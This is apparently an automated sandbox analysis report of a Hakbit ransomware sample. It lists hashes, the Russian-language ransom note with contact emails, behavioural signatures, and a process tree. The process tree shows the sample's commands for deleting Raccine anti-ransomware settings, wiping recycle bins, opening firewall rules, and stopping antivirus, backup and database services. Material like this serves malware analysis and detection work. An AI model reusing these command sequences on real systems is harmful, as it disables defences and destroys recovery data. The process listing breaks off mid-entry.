SyncApteka.bin

General
Target

SyncApteka.bin.exe

Filesize

128KB

Completed

19-04-2021 17:54

Score
10 /10
MD5

9606a0bdc7a04dcf4d8625345c2875cd

SHA1

34c37511ef2105aedf55eda054e89210757f51ec

SHA256

aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7

Malware Config

Extracted

Path C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
Family hakbit
Ransom Note
Ваша система была зашифрована. Для того что бы получить доступ к Вашим файлам и расшифровать их Вам необходимо связаться с нами по адрессам decoder44@rambler.ru alpinbovuar@protonmail.com (обращаем ваше внимание что могут возникнуть трудности по дохождению писем на протон с мейл.ру и яндекса) или телеграмма который мы Вам сообщим связавшись с вашими сотрудниками. Так же у нас есть данные от ваших баз данных, бекапов, телеграмы ваших сотрудников, личные данные ваших клиентов и доступы к платежным системам. Key Identifier: GzLn8PdFvBUkEE3Nytj2ov4h+/c0BPws/n75Il6PF5O3Jp5Bt2xLakkSBrEuCpRKar7ZTmO//Vdv1NMTiJM1EvjOxJKqyFJcG5LnDnJ2YMUQZcHhF+UE+HEkrz1rdqqRTcf3Nx0hFneJgvROBHmxvGyfWo0vRnfEvxilANjppvvAvvOmKHcV18lVcxQt5wAOgXLmdDzv9u3hkBtl6XuljjBPQuZEpODOgPJbaB29jV54s/gmaoyfsgovNcznIs9RP+CRm0dSFsaKU1ROy1ezn1bIoTIAzAaOuVrn3j4wt+nWuNYuQrKiNHBk3xQ71Yvi3Dm+1UodUpeI95JJtx3VjrspLJTZmFStOloMP1NsugEmt+TMb6FvTmSgwJSqjWqddxzEXbNlmpIko1ep4kpPrDPqn6Rwl9FFJCKExV4krOq9rUMqN26Q4/l/393DpSN/1o1r2chw4F6K/pdQo1rFPpg4UIz214aicMSvJvBjEkfbvFqqwDZjkwUnNLjelike5ODVB3bYIp5JrrmME/jYbGo8iwrqqQ8dr1B4VH05iNPYhM1mG0h0yD4fsPdEk7D+DfVkjgd0Xq501XGyl+7bA1U110ugQelafH7bs1aa7yEf7WLkOArGkU5dEt/ROJv4bXf+Zx2hIU4v2zpzLDaJ9EcYG6S82dLVMtlMc7LtNUg= Number of files that were processed is: 76
Emails

decoder44@rambler.ru

alpinbovuar@protonmail.com

Signatures 22

Filter: none

Defense Evasion
Discovery
Persistence
  • Hakbit

    Description

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Downloads MZ/PE file
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Modifies extensions of user files
    SyncApteka.bin.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Tags

    Reported IOCs

    descriptioniocprocess
    File renamedC:\Users\Admin\Pictures\InitializeExport.raw => C:\Users\Admin\Pictures\InitializeExport.raw.ejqvfpSyncApteka.bin.exe
    File opened for modificationC:\Users\Admin\Pictures\InitializeExport.raw.ejqvfpSyncApteka.bin.exe
    File renamedC:\Users\Admin\Pictures\StepCompare.png => C:\Users\Admin\Pictures\StepCompare.png.ejqvfpSyncApteka.bin.exe
    File opened for modificationC:\Users\Admin\Pictures\StepCompare.png.ejqvfpSyncApteka.bin.exe
  • Deletes itself
    cmd.exe

    Reported IOCs

    pidprocess
    3344cmd.exe
  • Drops startup file
    SyncApteka.bin.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnkSyncApteka.bin.exe
  • Modifies file permissions
    icacls.exeicacls.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    2284icacls.exe
    524icacls.exe
    928icacls.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Discovers systems in the same network
    net.exe

    Tags

    TTPs

    Remote System Discovery

    Reported IOCs

    pidprocess
    4360net.exe
  • Kills process with taskkill
    taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

    Tags

    Reported IOCs

    pidprocess
    2504taskkill.exe
    2480taskkill.exe
    2316taskkill.exe
    3780taskkill.exe
    3388taskkill.exe
    3848taskkill.exe
    412taskkill.exe
    2396taskkill.exe
    940taskkill.exe
    3508taskkill.exe
    2088taskkill.exe
    3188taskkill.exe
    3828taskkill.exe
    2592taskkill.exe
    2108taskkill.exe
    2808taskkill.exe
    3920taskkill.exe
    2252taskkill.exe
    3068taskkill.exe
    3124taskkill.exe
    3128taskkill.exe
    3020taskkill.exe
    3272taskkill.exe
    2392taskkill.exe
    3100taskkill.exe
    2572taskkill.exe
    4052taskkill.exe
    3056taskkill.exe
    1356taskkill.exe
    3268taskkill.exe
    2656taskkill.exe
    2516taskkill.exe
    952taskkill.exe
    3928taskkill.exe
    2272taskkill.exe
    2492taskkill.exe
    3540taskkill.exe
    3940taskkill.exe
    4020taskkill.exe
    3680taskkill.exe
    3484taskkill.exe
    3888taskkill.exe
    2796taskkill.exe
    2816taskkill.exe
    936taskkill.exe
    3196taskkill.exe
    2084taskkill.exe
    3976taskkill.exe
  • Modifies registry class
    rundll32.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_Classes\Local Settingsrundll32.exe
    Key created\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCacherundll32.exe
  • Modifies registry key
    reg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pidprocess
    528reg.exe
  • Opens file in notepad (likely ransom note)
    notepad.exe

    Tags

    Reported IOCs

    pidprocess
    4592notepad.exe
  • Runs net.exe
  • Runs ping.exe
    PING.EXE

    TTPs

    Remote System Discovery

    Reported IOCs

    pidprocess
    4076PING.EXE
  • Suspicious behavior: EnumeratesProcesses
    SyncApteka.bin.exe

    Reported IOCs

    pidprocess
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
    1756SyncApteka.bin.exe
  • Suspicious use of AdjustPrivilegeToken
    SyncApteka.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1756SyncApteka.bin.exe
    Token: SeDebugPrivilege412taskkill.exe
    Token: SeDebugPrivilege3680taskkill.exe
    Token: SeDebugPrivilege3828taskkill.exe
    Token: SeDebugPrivilege940taskkill.exe
    Token: SeDebugPrivilege2796taskkill.exe
    Token: SeDebugPrivilege3128taskkill.exe
    Token: SeDebugPrivilege2272taskkill.exe
    Token: SeDebugPrivilege3388taskkill.exe
    Token: SeDebugPrivilege2480taskkill.exe
    Token: SeDebugPrivilege2816taskkill.exe
    Token: SeDebugPrivilege2316taskkill.exe
    Token: SeDebugPrivilege2252taskkill.exe
    Token: SeDebugPrivilege3196taskkill.exe
    Token: SeDebugPrivilege4020taskkill.exe
    Token: SeDebugPrivilege2344powershell.exe
    Token: SeDebugPrivilege3068taskkill.exe
    Token: SeDebugPrivilege888powershell.exe
    Token: SeDebugPrivilege2592taskkill.exe
    Token: SeDebugPrivilege2656taskkill.exe
    Token: SeDebugPrivilege3100taskkill.exe
    Token: SeDebugPrivilege3268taskkill.exe
    Token: SeDebugPrivilege2492taskkill.exe
    Token: SeDebugPrivilege3124taskkill.exe
    Token: SeDebugPrivilege1356taskkill.exe
    Token: SeDebugPrivilege2088taskkill.exe
    Token: SeDebugPrivilege3020taskkill.exe
    Token: SeDebugPrivilege2084taskkill.exe
    Token: SeDebugPrivilege2108taskkill.exe
    Token: SeDebugPrivilege3188taskkill.exe
    Token: SeDebugPrivilege2392taskkill.exe
    Token: SeDebugPrivilege3272taskkill.exe
    Token: SeDebugPrivilege952taskkill.exe
    Token: SeDebugPrivilege3484taskkill.exe
    Token: SeDebugPrivilege3928taskkill.exe
    Token: SeDebugPrivilege3940taskkill.exe
    Token: SeDebugPrivilege3508taskkill.exe
    Token: SeDebugPrivilege2808taskkill.exe
    Token: SeDebugPrivilege3780taskkill.exe
    Token: SeDebugPrivilege2516taskkill.exe
    Token: SeDebugPrivilege3888taskkill.exe
    Token: SeDebugPrivilege936taskkill.exe
    Token: SeDebugPrivilege2396taskkill.exe
    Token: SeDebugPrivilege2504taskkill.exe
    Token: SeDebugPrivilege4052taskkill.exe
    Token: SeDebugPrivilege3848taskkill.exe
    Token: SeDebugPrivilege3540taskkill.exe
    Token: SeDebugPrivilege3976taskkill.exe
    Token: SeDebugPrivilege2572taskkill.exe
    Token: SeDebugPrivilege3920taskkill.exe
  • Suspicious use of FindShellTrayWindow
    SyncApteka.bin.exenotepad.exe

    Reported IOCs

    pidprocess
    1756SyncApteka.bin.exe
    4592notepad.exe
  • Suspicious use of SendNotifyMessage
    SyncApteka.bin.exe

    Reported IOCs

    pidprocess
    1756SyncApteka.bin.exe
  • Suspicious use of WriteProcessMemory
    SyncApteka.bin.exenet1.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1756 wrote to memory of 4121756SyncApteka.bin.exetaskkill.exe
    PID 1756 wrote to memory of 4121756SyncApteka.bin.exetaskkill.exe
    PID 1756 wrote to memory of 4121756SyncApteka.bin.exetaskkill.exe
    PID 1756 wrote to memory of 11121756SyncApteka.bin.exereg.exe
    PID 1756 wrote to memory of 11121756SyncApteka.bin.exereg.exe
    PID 1756 wrote to memory of 11121756SyncApteka.bin.exereg.exe
    PID 1756 wrote to memory of 5281756SyncApteka.bin.exereg.exe
    PID 1756 wrote to memory of 5281756SyncApteka.bin.exereg.exe
    PID 1756 wrote to memory of 5281756SyncApteka.bin.exereg.exe
    PID 1756 wrote to memory of 10481756SyncApteka.bin.exeschtasks.exe
    PID 1756 wrote to memory of 10481756SyncApteka.bin.exeschtasks.exe
    PID 1756 wrote to memory of 10481756SyncApteka.bin.exeschtasks.exe
    PID 1756 wrote to memory of 11961756SyncApteka.bin.execmd.exe
    PID 1756 wrote to memory of 11961756SyncApteka.bin.execmd.exe
    PID 1756 wrote to memory of 11961756SyncApteka.bin.execmd.exe
    PID 1756 wrote to memory of 6841756SyncApteka.bin.execmd.exe
    PID 1756 wrote to memory of 6841756SyncApteka.bin.execmd.exe
    PID 1756 wrote to memory of 6841756SyncApteka.bin.execmd.exe
    PID 1756 wrote to memory of 6641756SyncApteka.bin.exenetsh.exe
    PID 1756 wrote to memory of 6641756SyncApteka.bin.exenetsh.exe
    PID 1756 wrote to memory of 6641756SyncApteka.bin.exenetsh.exe
    PID 1756 wrote to memory of 18081756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 18081756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 18081756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 13201756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 13201756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 13201756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 14561756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 14561756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 14561756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 18441756SyncApteka.bin.exenetsh.exe
    PID 1756 wrote to memory of 18441756SyncApteka.bin.exenetsh.exe
    PID 1756 wrote to memory of 18441756SyncApteka.bin.exenetsh.exe
    PID 1756 wrote to memory of 16041756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 16041756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 16041756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 9481756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 9481756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 9481756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 16361756SyncApteka.bin.execonhost.exe
    PID 1756 wrote to memory of 16361756SyncApteka.bin.execonhost.exe
    PID 1756 wrote to memory of 16361756SyncApteka.bin.execonhost.exe
    PID 1756 wrote to memory of 13361756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 13361756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 13361756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 6521756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 6521756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 6521756SyncApteka.bin.exesc.exe
    PID 1756 wrote to memory of 1081756SyncApteka.bin.exenet.exe
    PID 1756 wrote to memory of 1081756SyncApteka.bin.exenet.exe
    PID 1756 wrote to memory of 1081756SyncApteka.bin.exenet.exe
    PID 1756 wrote to memory of 16961756SyncApteka.bin.exenet.exe
    PID 1756 wrote to memory of 16961756SyncApteka.bin.exenet.exe
    PID 1756 wrote to memory of 16961756SyncApteka.bin.exenet.exe
    PID 1756 wrote to memory of 8881756SyncApteka.bin.exepowershell.exe
    PID 1756 wrote to memory of 8881756SyncApteka.bin.exepowershell.exe
    PID 1756 wrote to memory of 8881756SyncApteka.bin.exepowershell.exe
    PID 1756 wrote to memory of 7921756SyncApteka.bin.exenet1.exe
    PID 1756 wrote to memory of 7921756SyncApteka.bin.exenet1.exe
    PID 1756 wrote to memory of 7921756SyncApteka.bin.exenet1.exe
    PID 1756 wrote to memory of 18521756SyncApteka.bin.execonhost.exe
    PID 1756 wrote to memory of 18521756SyncApteka.bin.execonhost.exe
    PID 1756 wrote to memory of 18521756SyncApteka.bin.execonhost.exe
    PID 108 wrote to memory of 1768108net1.exenet1.exe
  • System policy modification
    SyncApteka.bin.exe

    Tags

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"SyncApteka.bin.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"SyncApteka.bin.exe
Processes 598
  • C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe"
    Modifies extensions of user files
    Drops startup file
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:1756
    • C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:412
    • C:\Windows\system32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      PID:1112
    • C:\Windows\system32\reg.exe
      "reg" delete HKCU\Software\Raccine /F
      Modifies registry key
      PID:528
    • C:\Windows\system32\schtasks.exe
      "schtasks" /DELETE /TN "Raccine Rules Updater" /F
      PID:1048
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
      PID:1196
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q D:\\$Recycle.bin
      PID:684
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      PID:664
    • C:\Windows\system32\sc.exe
      "sc.exe" config Dnscache start= auto
      PID:1808
    • C:\Windows\system32\sc.exe
      "sc.exe" config FDResPub start= auto
      PID:1320
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      PID:1456
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
      PID:1844
    • C:\Windows\system32\sc.exe
      "sc.exe" config upnphost start= auto
      PID:948
    • C:\Windows\system32\sc.exe
      "sc.exe" config SSDPSRV start= auto
      PID:1604
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      PID:1636
    • C:\Windows\system32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      PID:1336
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      PID:652
    • C:\Windows\system32\net.exe
      "net.exe" start Dnscache /y
      PID:108
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start Dnscache /y
        PID:1768
    • C:\Windows\system32\net.exe
      "net.exe" stop bedbg /y
      PID:1696
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop bedbg /y
        PID:1216
    • C:\Windows\system32\net.exe
      "net.exe" start FDResPub /y
      PID:888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start FDResPub /y
        PID:964
    • C:\Windows\system32\net.exe
      "net.exe" stop EhttpSrv /y
      PID:1952
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EhttpSrv /y
        PID:2088
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SQLEXPRESS /y
      PID:920
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
        PID:2072
    • C:\Windows\system32\net.exe
      "net.exe" stop MMS /y
      PID:308
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MMS /y
        PID:2096
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ReportServer /y
          PID:4064
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SQL_2008 /y
      PID:1852
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
        PID:2064
    • C:\Windows\system32\net.exe
      "net.exe" start SSDPSRV /y
      PID:792
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start SSDPSRV /y
        PID:1588
    • C:\Windows\system32\net.exe
      "net.exe" start upnphost /y
      PID:860
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 start upnphost /y
        PID:2284
    • C:\Windows\system32\net.exe
      "net.exe" stop ekrn /y
      PID:560
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ekrn /y
        PID:2452
    • C:\Windows\system32\net.exe
      "net.exe" stop avpsus /y
      PID:1140
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        PID:2396
    • C:\Windows\system32\net.exe
      "net.exe" stop ccSetMgr /y
      PID:2220
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccSetMgr /y
        PID:2516
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      PID:2332
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        PID:2552
    • C:\Windows\system32\net.exe
      "net.exe" stop mozyprobackup /y
      PID:2344
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mozyprobackup /y
        PID:2712
    • C:\Windows\system32\net.exe
      "net.exe" stop RTVscan /y
      PID:2260
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop RTVscan /y
        PID:2704
    • C:\Windows\system32\net.exe
      "net.exe" stop SavRoam /y
      PID:2240
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SavRoam /y
        PID:2524
    • C:\Windows\system32\net.exe
      "net.exe" stop ccEvtMgr /y
      PID:2200
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccEvtMgr /y
        PID:2500
    • C:\Windows\system32\net.exe
      "net.exe" stop DefWatch /y
      PID:2180
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop DefWatch /y
        PID:2508
    • C:\Windows\system32\net.exe
      "net.exe" stop NetBackup BMR MTFTP Service /y
      PID:2160
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
        PID:2420
    • C:\Windows\system32\net.exe
      "net.exe" stop QBFCService /y
      PID:2384
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBFCService /y
        PID:2668
    • C:\Windows\system32\net.exe
      "net.exe" stop BMR Boot Service /y
      PID:2140
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BMR Boot Service /y
        PID:2468
    • C:\Windows\system32\net.exe
      "net.exe" stop Intuit.QuickBooks.FCS /y
      PID:2440
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
        PID:1708
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SYSTEM_BGC /y
      PID:2576
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
        PID:2688
    • C:\Windows\system32\net.exe
      "net.exe" stop EPSecurityService /y
      PID:2588
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EPSecurityService /y
        PID:2272
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecDiveciMediaService /y
      PID:2920
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
        PID:2596
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PRACTTICEBGC /y
      PID:3132
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
        PID:2584
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecDeviceMediaService /y
      PID:3116
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
        PID:2728
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos System Protection Service” /y
      PID:3100
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
        PID:3088
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PRACTICEMGT /y
      PID:3092
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
        PID:2724
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      PID:3076
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        PID:2352
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Safestore Service” /y
      PID:2624
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
        PID:2572
    • C:\Windows\system32\net.exe
      "net.exe" stop audioendpointbuilder /y
      PID:2692
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop audioendpointbuilder /y
        PID:1216
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$ECWDB2 /y
      PID:2716
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
        PID:2772
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      PID:2524
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        PID:2712
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Message Router” /y
      PID:2212
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Message Router” /y
        PID:3172
    • C:\Windows\system32\net.exe
      "net.exe" stop unistoresvc_1af40a /y
      PID:2152
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop unistoresvc_1af40a /y
        PID:1768
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$BKUPEXEC /y
      PID:2460
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
        PID:1520
    • C:\Windows\system32\net.exe
      "net.exe" stop ARSM /y
      PID:2112
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos MCS Client” /y
      PID:2336
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos MCS Client” /y
        PID:2556
    • C:\Windows\system32\net.exe
      "net.exe" stop msexchangeimap4 /y
      PID:2516
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop msexchangeimap4 /y
        PID:2280
    • C:\Windows\system32\net.exe
      "net.exe" stop “intel(r) proset monitoring service” /y
      PID:2232
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
        PID:2852
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$TPSAMA /y
      PID:2512
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
        PID:2764
    • C:\Windows\system32\net.exe
      "net.exe" stop AcrSch2Svc /y
      PID:2400
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        PID:2688
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos MCS Agent” /y
      PID:2504
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
        PID:2696
    • C:\Windows\system32\net.exe
      "net.exe" stop msexchangeadtopology /y
      PID:2172
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop msexchangeadtopology /y
        PID:3532
    • C:\Windows\system32\net.exe
      "net.exe" stop “aphidmonitorservice” /y
      PID:2164
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “aphidmonitorservice” /y
        PID:3832
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$TPS /y
      PID:2420
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$TPS /y
        PID:3752
    • C:\Windows\system32\net.exe
      "net.exe" stop “Zoolz 2 Service” /y
      PID:2568
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
        PID:3628
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$TPSAMA /y
      PID:2540
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
        PID:3808
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Health Service” /y
      PID:2536
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Health Service” /y
        PID:436
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeSRS /y
      PID:2428
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeSRS /y
        PID:3800
    • C:\Windows\system32\net.exe
      "net.exe" stop W3Svc /y
      PID:2600
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop W3Svc /y
        PID:4000
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$SYSTEM_BGC /y
      PID:2132
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
